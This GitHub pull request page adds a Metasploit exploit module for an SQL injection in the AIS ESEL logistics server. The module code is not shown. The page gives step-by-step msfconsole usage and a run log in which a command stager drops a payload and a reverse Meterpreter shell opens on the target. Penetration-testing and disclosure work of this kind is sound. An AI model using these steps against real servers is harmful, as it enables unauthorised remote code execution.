Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add an RCE exploit for the AIS logistics software #11641

Merged
merged 24 commits into from Apr 29, 2019

Conversation

Projects
None yet
5 participants
@p0w1
Copy link
Contributor

commented Mar 27, 2019

Add an RCE exploit for the AIS logistics software (www.ais.de). It exploits a SQL injection on the backend of their mobile app.

   This module will execute an arbitrary payload on an "ESEL" server used by the
    AIS logistic software. The server typically listens on port 5099 without TLS.
    There could also be server listening on 5100 with TLS but the port 5099 is
    usually always open.
    The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
    with the sa user is in place.

    This module was verified on version 67 but it should also run on lower versions.
    An fixed version was created by AIS in September 2017. However most systems
    have not been updated.`

    In regard to the payload, unless there is a closed port in the web server,
    you dont want to use any bind payload. You want a "reverse" payload,
    probably to your port 80 or to any other outbound port allowed on the firewall.

    Currently, one delivery method is supported

    This method takes advantage of the Command Stager subsystem. This allows using
    various techniques, such as using a TFTP server, to send the executable. By default
    the Command Stager uses 'wcsript.exe' to generate the executable on the target.

    NOTE: This module will leave a payload executable on the target system when the
    attack is finished.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/misc/ais_esel_server_rce
  • set RHOSTS <IP>
  • check
  • Verify "Server is vulnerable"
  • run
  • Verify Session opened

Scenarios

msf5 > use exploit/windows/misc/ais_esel_server_rce 
msf5 exploit(windows/misc/ais_esel_server_rce) > set rhosts 10.66.75.212
rhosts => 10.66.75.212
    msf5 exploit(windows/misc/ais_esel_server_rce) > check
    [+] 10.66.75.212:5099 - The target is vulnerable.
msf5 exploit(windows/misc/ais_esel_server_rce) > run

[*] Started reverse TCP handler on 10.66.75.208:4444 
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   1.47% done (1499/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] 10.66.75.212:5099 - Command Stager progress -   2.93% done (2998/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
    ...
[*] 10.66.75.212:5099 - Command Stager progress -  99.55% done (101827/102292 bytes)
[+] 10.66.75.212:5099 - Correct response received => Data send succesfully
[*] Sending stage (179779 bytes) to 10.66.75.212
[*] 10.66.75.212:5099 - Command Stager progress - 100.00% done (102292/102292 bytes)
[!] 10.66.75.212:5099 - The payload is left on the client in the %TEMP% Folder of the corresponding user.
[*] 10.66.75.212:5099 - Stager should now be executed. Waiting for 20 seconds..
[*] Meterpreter session 1 opened (10.66.75.208:4444 -> 10.66.75.212:57107) at 2019-03-27 11:04:29 +0100

meterpreter > getuid
Server username: NT Service\MSSQL$AIS

@p0w1 p0w1 changed the title Ais Add an RCE exploit for the AIS logistics software Mar 27, 2019

p0w1 added some commits Mar 27, 2019

@p0w1

This comment has been minimized.

Copy link
Contributor Author

commented Mar 27, 2019

Thanks for the fast feedback. I added all the suggested changes.

@bcoles

This comment has been minimized.

Copy link
Contributor

commented Mar 27, 2019

At some stage during the review process, the reviewer will request documentation for this module.

p0w1 added some commits Mar 28, 2019

@p0w1

This comment has been minimized.

Copy link
Contributor Author

commented Apr 1, 2019

Do you need anything else?

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 11, 2019

Please add module documentation.
I didn't see a link for the software. Is there a download link for the software to test the module?

p0w1 added some commits Apr 25, 2019

@p0w1

This comment has been minimized.

Copy link
Contributor Author

commented Apr 25, 2019

Please add module documentation.
I didn't see a link for the software. Is there a download link for the software to test the module?

You cannot download the software. It is not publicity available and I cannot provide you an instance to test the exploit. I can send you a wireshark dump if you want.

Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
Show resolved Hide resolved modules/exploits/windows/misc/ais_esel_server_rce.rb Outdated
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 25, 2019

I suggested a few more changes to the module.

You can send a PCAP to msfdev [at] metasploit.com so we can verify the module works.

jrobles-r7 and others added some commits Apr 25, 2019

Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>
Update modules/exploits/windows/misc/ais_esel_server_rce.rb
Co-Authored-By: p0w1 <39155277+p0w1@users.noreply.github.com>

@jrobles-r7 jrobles-r7 added docs and removed needs-docs labels Apr 26, 2019

@jrobles-r7 jrobles-r7 self-assigned this Apr 26, 2019

@jrobles-r7 jrobles-r7 merged commit f63a2a6 into rapid7:master Apr 29, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

jrobles-r7 added a commit that referenced this pull request Apr 29, 2019

msjenkins-r7 added a commit that referenced this pull request Apr 29, 2019

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Apr 29, 2019

Release Notes

The windows/misc/ais_esel_server_rce exploit module has been added to the framework. This module exploits an unauthenticated SQL injection in AIS ESEL-Server to execute commands on the server.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.